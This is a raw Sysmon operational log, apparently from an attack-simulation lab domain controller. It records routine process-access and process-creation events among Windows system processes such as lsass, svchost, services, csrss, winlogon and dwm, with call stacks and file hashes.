13:53:05.102{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000881Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.102{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000880Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000879Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000878Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000877Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0A00-000000009101}8521132C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000876Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000875Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000874Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000873Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000872Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0A00-000000009101}8521288C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000871Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0A00-000000009101}8521280C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000870Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000869Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}5961116C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000868Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000867Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0A00-000000009101}8521228C:\Windows\system32\services.exe{10ACEC4A-8541-5FCF-1400-000000009101}1268C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000866Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000865Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0800-000000009101}724740C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000864Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}596848C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000863Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0900-000000009101}7841072C:\Windows\system32\winlogon.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000862Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8540-5FCF-0C00-000000009101}596848C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000861Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000860Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.086{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-1{10ACEC4A-8541-5FCF-B0B2-000000000000}0xb2b01SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000859Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1100-000000009101}1204C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000858Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000857Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1c030|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000856Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.071{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000855Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 